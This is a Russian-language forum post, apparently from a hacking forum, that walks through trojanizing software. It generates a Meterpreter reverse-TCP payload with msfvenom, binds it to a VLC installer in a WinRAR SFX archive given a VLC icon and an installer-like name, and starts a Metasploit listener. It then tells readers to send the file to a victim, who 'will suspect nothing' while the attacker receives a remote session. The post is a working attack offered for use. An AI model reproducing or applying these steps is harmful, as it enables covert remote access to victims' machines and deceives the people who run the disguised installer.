• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Джоиним зловред и легитимный файл между собой

tabac

CPU register
Пользователь
Регистрация
30.09.2018
Сообщения
1 610
Решения
1
Реакции
3 332
Инструмент Trojanizer использует WinRAR (SFX), чтоб сжать два файла между собой и преобразовать их в исполняемый архив SFX (.exe). SFX-архив при работе запускает оба файла (наш payload и легальное приложение одновременно).

Откуда скачать?

Код:
git clone https://github.com/r00t-3xp10it/trojanizer.git

1.png


Далее создаем пейлоад, используя msfvenom

Код:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.111 lport=4466 -f exe > /root/Desktop/backdoor.exe

2.png



Запуск Trojanizer

Переходим в папку с Trojanizer и запускаем Trojanizer.sh файл. У Trojanizer есть зависимости, которые нужны для работы тулзы, он попробует их поставить сам, но в случае неудачи, установите следующие пакеты: Wine Program Files, WinRAR Software and Zenity.

3.png


4.png


5.png

После запуска откроется форма для сжатия. Здесь можно выбрать пейлоад, который мы создали, используя msfvenom, в самом начале.

6.png


После выбора пейлоада, откроется другое окно под названием Legit Application to Trojanize

7.png


Далее нужно выбрать любой исполняемый файл (.exe), который хотим связать с нашей нагрузкой. Я связываю VLC Player Installer File с моей нагрузкой.

8.png


После того, как вы нажмете ОК, необходимо будет задать новое имя для файла. Сохраните его как файл инсталлятор. Например, vlc-32bit-Installer или vlc-update64 или по вашему выбору.

9.png


Теперь необходимо выбрать иконку для нашего инсталлятора. Вы можете выбрать из списка по умолчанию или загрузить любой файл с иконкой в формате (.ico) из Google.

10.png


Как можно видеть из приведенного выше скрина, я добавил файл vlc-icon.ico как иконку.

После выбора файла иконки выпадает окно, сообщающее путь к новому файлу инсталлятору.

11.png


А теперь давайте поднимем Listener в Metasploit:
Код:
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.111
msf exploit(multi/handler) > set lport 4466
msf exploit(multi/handler) > run -j

12.png


Отправляем вредоносную программу на машину жертвы любым удобным способом.

Когда пользователь откроет файл, он получит обычное предупреждение о безопасности, как показано ниже.

13.png


После того, как жертва нажмет RUN, у пользователя начнет работать VLC installer, и он ничего не заподозрит.

14.png


Но в тоже время, у нас будет meterpreter сессия, как показано ниже.

15.png


Именно так можно связать файл нашу нагрузку с любым файлом программного обеспечения (.exe) с использованием Trojanizer.



Автор: Sanjeet Kumar
Первоисточник: Bind Payload using SFX archive with Trojanizer
Автор перевода @SooLFaa. codeby
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх